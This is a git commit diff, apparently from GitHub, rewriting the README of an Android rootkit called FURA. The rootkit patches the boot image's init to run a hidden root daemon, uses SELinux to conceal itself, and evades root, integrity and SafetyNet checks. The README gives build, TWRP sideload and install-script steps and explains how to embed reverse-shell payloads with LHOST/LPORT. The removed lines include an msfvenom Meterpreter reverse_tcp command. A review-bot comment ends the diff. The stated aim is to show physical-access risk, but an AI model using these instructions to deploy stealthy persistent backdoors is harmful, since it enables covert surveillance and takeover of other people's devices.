Commit e3d06ec

committed
transfer to git
1 parent 4fa52e2 commit e3d06ec

539 files changed

+1029
-42951
lines changed

README.MD

Lines changed: 121 additions & 56 deletions
@@ -1,108 +1,173 @@
1-
# Unlocked bootloader backdoor demo for Android
1+
# Flashable Usermode Rootkit for Android
22

3-
### [An article with full explaination / Статья на хабре с полным пояснением](https://habr.com/ru/post/541190/)
3+
#### A reworked version of [unlocked-bootloader-backdoor-demo](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo) by LuigiVampa92
44

5-
This is a tool that installs a custom binary into a system partition. This binary runs as a system daemon with root privileges and not restricted by SELinux policies. This tool is based on [Magisk](https://github.com/topjohnwu/Magisk) source code, but does not necessary require root or magisk preinstalled on the device. So basically this IS the magisk but only the part that injects new SELinux policies. It injects magiskinit binary in boot partition but does not install or use any other magisk tools. It also does not add any magisk files to device filesysytem, which allows it to avoid simple root detection tools, but unfortunately it is still detectable by SafetyNet.
5+
#### This is currently an experimental work. Stability is not guaranteed.
66

7-
The goal of this is to show that unlocking the bootloader can expose your device to an attacker with physical access.
7+
FURA is a systemless flashable backdoor installed into boot partition, particularly into _init_ binary.
8+
On boot, it launches a system daemon with root privileges and unrestricted SELinux context, which is also hidden from process list.
9+
Since it's operating within ramdisk, this tool can bypass most root checks, integrity checks, etc. and presumably cannot be detected without root _(not even by ADB shell)_.
810

9-
I successfully tested it on android 9 with normal init process and android 10 with two-staged init. It should work on other configurations as well but there can be troubles.
11+
Unlike its predecessor, this rootkit can bypass SafetyNet, since it doesn't need to modify system partition. \
12+
However, it can't bypass hardware checks, such as hardware-backed SafetyNet on newer devices.
1013

11-
In this repo the embedded binary is made for the demo purposes only. It just drops a line to logcat once in 5 seconds, but you cat replace it with your own if you want. For example, if you are on Kali you can generate the reverse shell payload:
12-
```
13-
$ rm revshell/revshell
14-
$ msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=<YOUR_LISTENER_IP> LPORT=<YOUR_LISTENER_PORT> -f elf > revshell/revshell
15-
```
16-
After that you can build the packages and flash your binary instead of the one provided with the repo.
14+
The daemon is a custom executor (sort of a service manager) for an arbitrary payload.
15+
It runs silently and normally leaves no traces in _dmesg_, _logcat_, etc., unlike a regular service run by _init_ in loop.
1716

18-
## Prerequisites
17+
FURA uses SELinux to its own advantage: not only to bypass stock policy restrictions, but to hide itself from the rest of the system.
1918

20-
- First, you have to install android SDK for your OS if you haven't already.
21-
- Second, make sure you have python3 installed.
19+
This tool, like its predecessor, is based on [Magisk](https://github.com/topjohnwu/Magisk) source code, but does not necessary require root or Magisk preinstalled on the device.
20+
It mostly uses a part of MagiskInit to patch SELinux policy.
21+
22+
## Prerequisites
2223

23-
After that you are all set up.
24+
- Python 3
25+
- Android SDK
26+
- ADB / Fastboot tools
27+
- Custom recovery image for your device (TWRP is recommended)
28+
- ##### **No Magisk installed on device!!!** &ensp; (compatibility issues cause bootloop)
2429

2530
## Build
2631

27-
The result package is a TWRP sideloadable zip file.
32+
_cd_ into main project directory.
2833

29-
set a ANDROID_SDK_ROOT variable in your shell. For example:
34+
Set ANDROID_SDK_ROOT variable in your shell. For example:
3035
```
31-
$ ANDROID_SDK_ROOT=/usr/lib/android-sdk
32-
$ export ANDROID_SDK_ROOT
36+
$ export ANDROID_SDK_ROOT=/opt/android-sdk
3337
```
3438

35-
Prepare NDK for the build:
39+
Install and configure NDK:
3640
```
3741
$ ./build_revshell.py ndk
3842
```
3943

40-
Run the build:
44+
Run the build script:
4145
```
46+
$ ./build_revshell.py clean # before rebuild if changed config
4247
$ ./build_revshell.py
4348
```
4449

45-
## Download
50+
The result is a sideloadable _.zip_ package which can be installed with TWRP or other recovery.
51+
52+
_Note_: if using reverse shell payloads (such as ReverseSSH, Meterpreter, etc.), set your LHOST and LPORT in `config.prop` before building.
53+
54+
_Note_: if SELinux is _permissive_ or _off_ on the target device, you can use alternative hiding method. See `config.prop` for details.
55+
56+
_Note_: you can disable logging (logcat and selinux) by setting `release=True` in the end of `build_revshell.py`.
57+
4658

47-
You can download release packages directly:
48-
- [zip_reverse_shell_install.zip](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo/releases/download/v1.0/zip_reverse_shell_install.zip)
49-
- [zip_reverse_shell_uninstall.zip](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo/releases/download/v1.0/zip_reverse_shell_uninstall.zip)
59+
## Deploy
5060

51-
## Install
61+
#### Install
5262

53-
Run TWRP on your device.
63+
Run TWRP on your device:
64+
```
65+
$ fastboot boot twrp.img
66+
```
5467

55-
Start sideload feature in Advanced/Sideload and then run:
68+
Start sideload feature in Advanced / Sideload and then run:
5669
```
57-
$ adb sideload zip_reverse_shell_install.zip
70+
$ adb sideload zip_reverse_shell_v2.zip
5871
```
5972

60-
Check out the output log carefully. If you have been warned that you need to backup original partitions then you have to run the command below BEFORE rebooting into system, otherwise you will not be able to uninstall this tool properly and will have to find stock boot image for your device somewhere and flash it.
73+
At this moment, **do not reboot** right away. Backup original boot partition:
6174
```
6275
$ adb pull /tmp/backup_original_partitions .
6376
```
6477

65-
Reboot into system.
78+
Run the command **before** rebooting into system, otherwise you will not be able to uninstall this tool properly and will have to find stock boot image for your device somewhere and flash it.
6679

67-
You should now be able to see new lines in logcat:
80+
Reboot into system after you have backups on your PC.
6881

82+
#### Uninstall
83+
84+
You need a backup of original partitions made during installation. Move it to _/tmp_:
6985
```
70-
$ adb logcat | grep revshell
71-
01-31 23:42:07.587 3589 3589 D revshell: Start successfull!
72-
01-31 23:42:07.588 3589 3589 D revshell: Signals are set to ignore
73-
01-31 23:42:07.588 3589 3589 D revshell: Hey I'm a revshell process!
74-
01-31 23:42:07.588 3589 3589 D revshell: My PID -- 3589
75-
01-31 23:42:07.588 3589 3589 D revshell: My parent PID -- 1
76-
01-31 23:42:07.588 3589 3589 D revshell: My UID -- 0
77-
01-31 23:42:07.588 3589 3589 D revshell: Awaiting encrypted FS decryption now...
78-
01-31 23:42:27.597 3589 3589 D revshell: FS has been decrypted!
79-
01-31 23:42:27.597 3589 3589 D revshell: Starting reverse shell now
80-
01-31 23:42:32.597 3589 3589 D revshell: tick ! 25 seconds since process started
81-
01-31 23:42:37.598 3589 3589 D revshell: tick ! 30 seconds since process started
82-
01-31 23:42:42.599 3589 3589 D revshell: tick ! 35 seconds since process started
83-
01-31 23:42:47.600 3589 3589 D revshell: tick ! 40 seconds since process started
86+
$ adb push backup_original_partitions /tmp/
8487
```
8588

86-
## Uninstall
89+
Start sideload feature in Advanced / Sideload and then run:
90+
```
91+
$ adb sideload zip_reverse_shell_uninstall.zip
92+
```
8793

88-
Use zip_reverse_shell_uninstall.zip to properly uninstall this tool.
94+
Reboot into system.
8995

90-
If during installation you have made a backup of original partitions then run:
96+
... or you can just flash stock boot image if you have one:
9197
```
92-
$ adb push backup_original_partitions /tmp/backup_original_partitions
98+
$ fastboot flash boot boot.img
9399
```
94100

95-
Start sideload feature in Advanced/Sideload and then run:
101+
#### Installation scripts
102+
103+
There are installation scripts to automate install / reinstall process. \
104+
Before running one, rename or symlink your TWRP image as `twrp` in your current directory.
105+
106+
Simply connect your device via USB and switch it into Fastboot mode.
107+
After installation, backups will be saved automatically.
108+
109+
`install.sh` to install and save backup image. \
110+
`reinstall.sh` to reinstall quickly (if you have the backup).\
111+
`uninstall.sh` to restore original boot image from backup.
112+
113+
## Test
114+
115+
The default payload in this repo is a dummy program that writes stuff to logcat.
116+
117+
After boot is completed, you should be able to see its output:
118+
96119
```
97-
$ adb sideload zip_reverse_shell_uninstall.zip
120+
$ adb logcat | grep revshell
121+
03-18 00:34:41.732 2381 2381 D revshell_exec: Remounting /sbin to avoid mount detection ...
122+
03-18 00:34:41.732 2381 2381 D revshell_exec: Setting up /mnt/secure/temp
123+
03-18 00:34:41.732 2381 2381 D revshell_exec: Awaiting decryption ...
124+
03-18 00:34:41.732 2381 2381 D revshell_exec: Decrypted. Setting persistence dir at /data/adb/.aura
125+
03-18 00:34:46.817 2381 2381 I revshell_exec: restarting ...
126+
03-18 00:34:46.884 3197 3197 D revshell: Start successfull!
127+
03-18 00:34:46.885 3197 3197 D revshell: Signals are set to ignore
128+
03-18 00:34:46.885 3197 3197 D revshell: Hey I'm a revshell process!
129+
03-18 00:34:46.885 3197 3197 D revshell: My PID -- 3197
130+
03-18 00:34:46.885 3197 3197 D revshell: My parent PID -- 2381
131+
03-18 00:34:46.885 3197 3197 D revshell: My UID -- 0
132+
03-18 00:34:46.885 3197 3197 D revshell: Awaiting encrypted FS decryption now...
133+
03-18 00:34:51.241 2381 2381 D revshell_exec: Checking PID
134+
03-18 00:34:51.311 3197 3197 D revshell: FS has been decrypted!
135+
03-18 00:34:51.311 3197 3197 D revshell: Starting reverse shell now
136+
03-18 00:34:56.242 2381 2381 D revshell_exec: Checking PID
137+
03-18 00:34:56.312 3197 3197 D revshell: tick ! 10 seconds since process started
138+
03-18 00:35:01.244 2381 2381 D revshell_exec: Checking PID
139+
03-18 00:35:01.312 3197 3197 D revshell: tick ! 15 seconds since process started
140+
03-18 00:35:06.244 2381 2381 D revshell_exec: Checking PID
98141
```
99142

100-
Reboot into system.
143+
You can disable logging (logcat and selinux) by setting `release=True` in the end of `build_revshell.py`.
144+
145+
## Custom payloads
146+
147+
To embed a custom payload, simply put your executable into `revshell/{arch}/` as `revshell`. It is not required to place executables for all archs: those where `revshell` is absent will use default payload.
148+
149+
For more details on custom payloads, see _revshell_ directory.
150+
101151

102152
## Acknowledgments
103153

104-
Great thanks to topjohnwu and magisk contributors for their amazing work and incredible contribution to android tinkerers community. This Demo wouldn't even exist without them.
154+
Thanks to LuigiVampa92 for a [great article](https://habr.com/ru/articles/541190/) on a physical access attack concept for devices with unlocked bootloader.
155+
156+
Thanks to topjohnwu and all Magisk maintainers for that brilliant swiss army knife for Android and a great contribution to Android modding community.
157+
158+
## Links
159+
160+
[Magisk repository](https://github.com/topjohnwu/Magisk) \
161+
[Original system backdoor](https://github.com/LuigiVampa92/unlocked-bootloader-backdoor-demo)
105162

106-
## Links:
107163

108-
[Original Magisk repository](https://github.com/topjohnwu/Magisk)
164+
## Disclaimer
165+
166+
This tool is designed for educational purposes only. You may utilize this software solely on
167+
your personal devices. Any attempt to use this tool on a device without explicit authorization
168+
is unethical and may violate privacy laws.
169+
170+
Running this tool may result in bricking or damaging your device. Create backups of your data
171+
and /boot (/boot_a, /boot_b) partitions before using the tool.
172+
173+
Use at your own risk. The developer is not responsible for any damage or loss caused by this tool.
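Review bot: the new README's detection claims do not match its own sample output. Lines 8-9 of the new file say the daemon is "operating within ramdisk" and "presumably cannot be detected without root (not even by ADB shell)", and line 15 says it "normally leaves no traces", yet the Test section's log shows `D revshell_exec: Decrypted. Setting persistence dir at /data/adb/.aura` and `D revshell_exec: Remounting /sbin to avoid mount detection ...`, so the executor writes a directory under /data/adb and changes the /sbin mount, both of which are observable on the device by a root-level inspector or by an integrity check that walks /data/adb or the mount table. Either document what is written to /data/adb/.aura and why that is acceptable, or narrow the "no traces" and "cannot be detected" wording to what the ramdisk patch actually guarantees. Two smaller points in the same hunk: the `release=True` logging note appears twice (in the Build notes and again after the Test output), so keep one copy; and the Install step now unconditionally says "Backup original boot partition" via `adb pull /tmp/backup_original_partitions .`, whereas the removed text only required it when the installer warned about it, so state whether the installer always creates that path, otherwise the pull errors out and the user reboots without a backup.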

app/.gitignore

Lines changed: 0 additions & 11 deletions
This file was deleted.
